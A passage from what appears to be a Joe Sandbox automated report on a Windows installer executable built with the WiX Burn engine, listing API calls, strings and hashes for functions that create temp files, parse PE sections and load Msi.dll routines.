52402->52407 52409 407fa7 FreeLibrary 52402->52409 52404 407f61 52403->52404 52405 407f77 52403->52405 52404->52402 52404->52405 52410 407dd0 DloadReleaseSectionWriteAccess 8 API calls 52405->52410 52406 40800c GetProcAddress 52411 40801c GetLastError 
52406->52411 52416 40806a 52406->52416 52407->52406 52407->52416 52408 407ec3 52408->52401 52408->52402 52408->52407 52408->52416 52409->52407 52412 407f82 RaiseException 52410->52412 52413 40802f 52411->52413 52412->52400 52415 407dd0 DloadReleaseSectionWriteAccess 8 API calls 52413->52415 52413->52416 52417 408050 RaiseException 52415->52417 52426 407dd0 52416->52426 52418 407b90 ___delayLoadHelper2@8 7 API calls 52417->52418 52419 408067 52418->52419 52419->52416 52421 407bbd 52420->52421 52422 407b9c 52420->52422 52421->52397 52421->52408 52434 407c39 52422->52434 52424 407ba1 52424->52421 52439 407d62 52424->52439 52427 407de2 52426->52427 52428 407e04 52426->52428 52429 407c39 DloadReleaseSectionWriteAccess 4 API calls 52427->52429 52428->52400 52430 407de7 52429->52430 52431 407dff 52430->52431 52432 407d62 DloadProtectSection 3 API calls 52430->52432 52446 407e06 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 52431->52446 52432->52431 52444 407bc3 GetModuleHandleW GetProcAddress GetProcAddress 52434->52444 52436 407c3e 52437 407c5a 52436->52437 52438 407c56 RtlAcquireSRWLockExclusive 52436->52438 52437->52424 52438->52424 52440 407d77 DloadProtectSection 52439->52440 52441 407db2 VirtualProtect 52440->52441 52442 407d7d 52440->52442 52445 407c78 VirtualQuery GetSystemInfo 52440->52445 52441->52442 52442->52421 52444->52436 52445->52441 52446->52428 53850 40a580 6 API calls 52455 439280 52460 439dd1 52455->52460 52457 4392af ReadFile 52458 4392c7 GetLastError 52457->52458 52459 4392d3 52457->52459 52458->52459 52461 439de6 52460->52461 52462 439dec SetFilePointerEx 52461->52462 52464 439e0f 52461->52464 52463 439e03 GetLastError 52462->52463 52462->52464 52463->52464 52464->52457 53851 438780 72 API calls 53780 45de80 GetProcessHeap 53781 462c80 IsProcessorFeaturePresent 53853 45c383 44 API calls 2 library calls 53854 476581 16 API calls ___delayLoadHelper2@8 53783 45928b 42 API calls 2 library calls 
53784 40ae90 17 API calls 53856 40b390 79 API calls 2 library calls 53786 42ba90 19 API calls 53788 45b490 75 API calls 2 library calls 53789 45cc90 GetCommandLineA GetCommandLineW 53858 451793 14 API calls 53792 40a6a0 54 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53863 40aba0 9 API calls 53866 42bfa0 98 API calls 53868 44a7a0 92 API calls 53869 4515a0 49 API calls __RTC_Initialize 53796 4080b0 73 API calls 53871 4285b0 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 53797 4390b0 GetProcessHeap HeapFree GetLastError 53872 43abb0 95 API calls 53798 45bcb0 46 API calls 2 library calls 53874 4595bd 44 API calls __freea

Control-flow Graph (legend: Executed / Not Executed; graph rendering not recoverable as text)
APIs
• GetLocalTime.KERNEL32(00000000,00000000,00000001,0000000C,00000000,?,00000000,00000000,0000000C,00000000,00000000,00000000,00000000,00481EB0,?,00000000), ref: 00405FB7
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00406026
• GetLastError.KERNEL32 ref: 00406033
• Sleep.KERNEL32(00000064), ref: 00406047
• CloseHandle.KERNEL32(00000000), ref: 004060EC
Strings
• $yG, xrefs: 00405FC6
• Failed to copy temp path to return., xrefs: 004060AB
• Failed to get temp folder., xrefs: 00405F1F
• %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00405FF9
• Failed to concatenate the temp folder and log prefix., xrefs: 00405F47
• failed to allocate memory for the temp path, xrefs: 004060CA
• $yG, xrefs: 00405FA2
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp, xrefs: 00405EFD, 00405F89, 004060D9
                                                                                                                                                          • Failed to combine directory and log prefix., xrefs: 00405EEE
                                                                                                                                                          • Failed to create temp file: %ls, xrefs: 0040607F
                                                                                                                                                          • Failed to ensure temp file path exists: %ls, xrefs: 00405F7A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLastLocalSleepTime
                                                                                                                                                          • String ID: $yG$$yG$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$Failed to combine directory and log prefix.$Failed to concatenate the temp folder and log prefix.$Failed to copy temp path to return.$Failed to create temp file: %ls$Failed to ensure temp file path exists: %ls$Failed to get temp folder.$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\pathutil.cpp$failed to allocate memory for the temp path
                                                                                                                                                          • API String ID: 1968021109-2923328553
                                                                                                                                                          • Opcode ID: 0834cc44c5fc16194783fc255d62b71c104143b5b8dff40e2aaade7ea0a24b74
                                                                                                                                                          • Instruction ID: b581c5703ef614e97ea617981991a49172d05e13367e62e9fd2470ea9df9083f
                                                                                                                                                          • Opcode Fuzzy Hash: 0834cc44c5fc16194783fc255d62b71c104143b5b8dff40e2aaade7ea0a24b74
                                                                                                                                                          • Instruction Fuzzy Hash: 8481A471E40615ABEB20AB95CC45FEF7AB4EB08710F114137FA05B62D1D27C9D508BA9

                                                                                                                                                          Control-flow Graph

                                                                                                                                                           Control-flow graph for 00401121-00401224 (rendered graph; edge list omitted): a subcall to 406418 (which resolves the module file name), CreateFileW at 401192, then subcalls 401641, 4010b0 and 4091f2; the result is checked at 4011d1 with an error path through 4012a1, followed by CloseHandle at 4011f8 and cleanup via 404128 and 451586.
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00406418: SetLastError.KERNEL32(00000000,?,?,?), ref: 0040642D
                                                                                                                                                            • Part of subcall function 00406418: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0040643C
                                                                                                                                                            • Part of subcall function 00406418: GetLastError.KERNEL32(?,?,?), ref: 00406446
                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 004011A7
                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?, xG8xGPxGhxG,?,cabinet.dll,00000009,?,00000000), ref: 004011F9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFileLast$CloseCreateHandleModuleName
                                                                                                                                                          • String ID: xG$ xG8xGPxGhxG$8xG$D:\a\wix\wix\src\burn\stub\stub.cpp$Failed to run application.$PxG$cabinet.dll$comres.dll$hxG$msi.dll$version.dll$wininet.dll
                                                                                                                                                          • API String ID: 875945561-1648032986
                                                                                                                                                          • Opcode ID: f85726a8e27148a2b8588cc1bc1d25474e0074f2f4eec37eb048951f729f2ced
                                                                                                                                                          • Instruction ID: 9d7be30ccfd11834a924bcfa88db5c814f8bdc1a43ee04bb7f2c8dd4e9365501
                                                                                                                                                          • Opcode Fuzzy Hash: f85726a8e27148a2b8588cc1bc1d25474e0074f2f4eec37eb048951f729f2ced
                                                                                                                                                          • Instruction Fuzzy Hash: C1318771D00218ABDB10EFA5DC49FDE7BB8EF08714F91812AF914BA2D1D7785904CBA9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: D$urlmon.dll$user32.dll
                                                                                                                                                          • API String ID: 0-2923083034
                                                                                                                                                          • Opcode ID: 5e5894942de7e616650e19efdfecf0d8f36ae196b8ad540547fca1c224627e02
                                                                                                                                                          • Instruction ID: edbb5c4d2b5848b5440427d6054734a44d5b3f6abbd36b2b3d3ea23a6f921c5a
                                                                                                                                                          • Opcode Fuzzy Hash: 5e5894942de7e616650e19efdfecf0d8f36ae196b8ad540547fca1c224627e02
                                                                                                                                                          • Instruction Fuzzy Hash: CF123D24D19668DAEB60DB60CC48BDAB276EFA4304F0051DDA10DA7291E77B5FD0CF1A
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000), ref: 0040511E
                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000), ref: 0040512A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                           • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                           • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2295610775-0
                                                                                                                                                          • Opcode ID: ae166459c5cf7da1ab5731963cb4613cb55a19944e2e63453550959f56e936f7
                                                                                                                                                          • Instruction ID: 9b5cb363380aea704d6be7c505647f0d50c4cdf5f0cbb647bf2bebaed7910e8a
                                                                                                                                                          • Opcode Fuzzy Hash: ae166459c5cf7da1ab5731963cb4613cb55a19944e2e63453550959f56e936f7
                                                                                                                                                          • Instruction Fuzzy Hash: FF01FE31A005086BCB10EF65DC89E9BB3BCEBC5315F400076F914D7291D6389E8D8F58

                                                                                                                                                          Control-flow Graph

                                                                                                                                                           Control-flow graph for 0040f28d-0040fb2f (rendered graph; edge list omitted): after two subcalls to 452250, a sequence of SetFilePointerEx / ReadFile pairs (40f34e, 40f3a0, 40f416, 40f46a, 40f4e4, 40f54b, 40f5a8, 40f605, 40f664), each followed by a GetLastError block whose failure path builds an error through 40129e and exits via 4012a1 and 451586; the ReadFile at 40f6c2-40f6e6 sits in a loop back to 40f68b, after which the function continues through subcalls 4073cd, 405811, 4523b0, 40ef76 and 40758b.
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004087CC,00000000,004080B0), ref: 0040F304
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F356
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004087CC,00000000,004080B0), ref: 0040F360
                                                                                                                                                          • ReadFile.KERNELBASE(004080B0,004087E8,00000040,?,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F3B0
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,004087CC,00000000,004080B0), ref: 0040F3BA
                                                                                                                                                          • SetFilePointerEx.KERNELBASE(004080B0,004080B0,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F420
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F42A
                                                                                                                                                          • ReadFile.KERNELBASE(004080B0,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F47D
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F487
• SetFilePointerEx.KERNELBASE(004080B0,00408018,00000000,00000000,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F501
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F50B
• ReadFile.KERNEL32(004080B0,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F55E
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F568
• ReadFile.KERNEL32(004080B0,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F5BB
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F5C5
• SetFilePointerEx.KERNELBASE(004080B0,004080B0,00000000,00000000,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F61A
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F624
• ReadFile.KERNEL32(004080B0,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F67E
• ReadFile.KERNEL32(004080B0,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F6DE
• GetLastError.KERNEL32(?,00000000,00000000,?,?,?,004087CC,00000000,004080B0), ref: 0040F6E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorFileLast$Read$Pointer
• String ID: .wix$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data too short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$Invalid section info, cContainers too large: %u$PE Header from file didn't match PE Header in memory.$burn$d:\a\wix\wix\src\burn\engine\section.cpp$feclient.dll
• API String ID: 3909885910-126637462
• Opcode ID: c1eec8764d78f0953d7f79c28b219eb8137ae6fd7fd4f68d3baaa8f7a06c8bce
• Instruction ID: f97d5f3addba17084108eedf85ef9cad971bfb3f0afee4f8d2368b86cae05ce7
• Opcode Fuzzy Hash: c1eec8764d78f0953d7f79c28b219eb8137ae6fd7fd4f68d3baaa8f7a06c8bce
• Instruction Fuzzy Hash: 14220A72A403247BE7309A148D86FAB36A8AF05B54F1141BBBD0CBB6C1D67C9C448F9D

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040929D
  • Part of subcall function 0046606B: InitializeCriticalSection.KERNEL32(004B2588,?,004092A9,00000000,?,?,?,?,?,?), ref: 00466082
• CoInitializeEx.OLE32(00000000,00000000,?,?,00000000,?,?,00000003,00000000,004080B0,00000000,?,?,?,?,?), ref: 00409362
• GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?), ref: 00409476
  • Part of subcall function 00406418: SetLastError.KERNEL32(00000000,?,?,?), ref: 0040642D
  • Part of subcall function 00406418: GetModuleFileNameW.KERNEL32(?,?,00000001,?,?,?), ref: 0040643C
  • Part of subcall function 00406418: GetLastError.KERNEL32(?,?,?), ref: 00406446
Strings
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: ErrorInitializeLastModule$CriticalFileHandleInfoNameNativeSectionSystem
• String ID: xG8xGPxGhxG$5.0.0+41e11442b2ca93e444b60213b5ae99dcbab787d8$ARM$ARM64$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run elevated mode.$Failed to run embedded mode.$Failed to run normal mode.$Invalid run mode.$d:\a\wix\wix\src\burn\engine\engine.cpp$unknown architecture$x64$x86
• API String ID: 3064534873-1295423453
• Opcode ID: 80bb65c861729b14a91656232008abeb9c05e07448eab37c2aeccbbcdcc12b4b
• Instruction ID: 0e6cde0659f409a751ac756052768a7588cd8fc235680f47554dd2785a81a8c1
• Opcode Fuzzy Hash: 80bb65c861729b14a91656232008abeb9c05e07448eab37c2aeccbbcdcc12b4b
• Instruction Fuzzy Hash: A4F1B971E41329A6DB31AA618C46FEE7664AB44704F1540FBF908B62C3DB7C5E808FD9

Control-flow Graph

APIs
  • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
  • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004707C4
• GetCurrentProcess.KERNEL32(00000000), ref: 004707DC
• RegCloseKey.ADVAPI32(00000000,00000001,00000004,00000001,TEMP,00000000,80000002,System\CurrentControlSet\Control\Session Manager\Environment,00020019,00000000), ref: 004709DD
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path3utl.cpp, xrefs: 004707A8, 004709B3
• Failed to ensure array size for system TEMP value., xrefs: 00470953
• Failed to check if running as system., xrefs: 004707EE
• Failed to load kernel32.dll, xrefs: 0047079C
• Failed to ensure array size for Windows\TEMP value., xrefs: 004709A7
• System\CurrentControlSet\Control\Session Manager\Environment, xrefs: 00470868
• Failed to get system Windows subdirectory path TEMP., xrefs: 00470985
• Failed to ensure array size for Windows\SystemTemp value., xrefs: 0047083E
• Failed to open system environment registry key., xrefs: 0047089A
• kernel32.dll, xrefs: 0047078C
• GetTempPath2W, xrefs: 004707BC
• SystemTemp, xrefs: 00470809
• Failed to get temp path from system TMP., xrefs: 004708CA
• Failed to ensure array size for system TMP value., xrefs: 004708F4
• Failed to get temp path from system TEMP., xrefs: 0047092C
• Failed to get system Windows subdirectory path SystemTemp., xrefs: 00470819
• TEMP, xrefs: 00470919, 00470975
• TMP, xrefs: 004708B7
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
• API ID: AddressCloseCurrentErrorLastLibraryLoadProcProcess
• String ID: Failed to check if running as system.$Failed to ensure array size for Windows\SystemTemp value.$Failed to ensure array size for Windows\TEMP value.$Failed to ensure array size for system TEMP value.$Failed to ensure array size for system TMP value.$Failed to get system Windows subdirectory path SystemTemp.$Failed to get system Windows subdirectory path TEMP.$Failed to get temp path from system TEMP.$Failed to get temp path from system TMP.$Failed to load kernel32.dll$Failed to open system environment registry key.$GetTempPath2W$SystemTemp$System\CurrentControlSet\Control\Session Manager\Environment$TEMP$TMP$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\path3utl.cpp$kernel32.dll
• API String ID: 1593934338-1326448564
• Opcode ID: 73f9f7b3b521d66e9a3a15f4bac467cc3e00539c18fe34882a7a3f1749bd14cd
• Instruction ID: f3f20c38a0f818d7727ddce1e5e93a94859339d1ca01e3b9223e4880cf6eb5cf
• Opcode Fuzzy Hash: 73f9f7b3b521d66e9a3a15f4bac467cc3e00539c18fe34882a7a3f1749bd14cd
• Instruction Fuzzy Hash: E471D8B1B82325FBEB219A50CC5AFDE7664DF11B15F218057FA047A2C3E3B89D1186C9

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 0046A5B7
• GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 0046A5DB
• GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 0046A5FF
• GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 0046A623
• GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 0046A647
• GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 0046A66B
• GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 0046A68F
• GetProcAddress.KERNEL32(MsiBeginTransactionW), ref: 0046A6BC
• GetProcAddress.KERNEL32(MsiEndTransaction), ref: 0046A6DB
Strings
• d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wiutil.cpp, xrefs: 0046A588
                                                                                                                                                          • Failed to load Msi.DLL, xrefs: 0046A579
                                                                                                                                                          • MsiSetExternalUIRecord, xrefs: 0046A660
                                                                                                                                                          • MsiDeterminePatchSequenceW, xrefs: 0046A5AC
                                                                                                                                                          • MsiBeginTransactionW, xrefs: 0046A6B1
                                                                                                                                                          • MsiEnumProductsExW, xrefs: 0046A5F4
                                                                                                                                                          • MsiSourceListAddSourceExW, xrefs: 0046A684
                                                                                                                                                          • MsiEndTransaction, xrefs: 0046A6D0
                                                                                                                                                          • Msi.dll, xrefs: 0046A569
                                                                                                                                                          • MsiGetProductInfoExW, xrefs: 0046A63C
                                                                                                                                                          • MsiGetPatchInfoExW, xrefs: 0046A618
                                                                                                                                                          • MsiDetermineApplicablePatchesW, xrefs: 0046A5D0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc
                                                                                                                                                          • String ID: Failed to load Msi.DLL$Msi.dll$MsiBeginTransactionW$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEndTransaction$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW$d:\a\wix\wix\src\libs\dutil\wixtoolset.dutil\wiutil.cpp
                                                                                                                                                          • API String ID: 190572456-104341795
                                                                                                                                                          • Opcode ID: a0edc544dc1483869eed9476213ad9e37e3572cc2518a7d46e7c57875e5c54b5
                                                                                                                                                          • Instruction ID: 3e015899b0414e053c38db4810faae47a9b0b86bc662762cf7d8dfc72c72aeb1
                                                                                                                                                          • Opcode Fuzzy Hash: a0edc544dc1483869eed9476213ad9e37e3572cc2518a7d46e7c57875e5c54b5
                                                                                                                                                          • Instruction Fuzzy Hash: E341C270544701AFDB21AF20EF09B1B3EA2E725745F6042BAE001A52B1EBF90995CF5E

Control-flow Graph
(graph image omitted; covers basic blocks 46553f-465696)

APIs
  • Part of subcall function 004018A4: LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018C0
  • Part of subcall function 004018A4: GetLastError.KERNEL32(?,004010FF,Comctl32.dll,?,00000000,?,00000000), ref: 004018D1
• GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 00465561
• GetProcAddress.KERNEL32(SystemFunction041), ref: 00465577
• GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 004655D8
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 004655F0
• GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 00465636
• GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0046564E
Memory Dump Source
• Source File: 00000000.00000002.2189052829.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2189036895.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189094487.0000000000477000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189123511.00000000004B1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189138005.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2189170621.00000000004C9000.00000020.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_thcdVit1dX.jbxd
Similarity
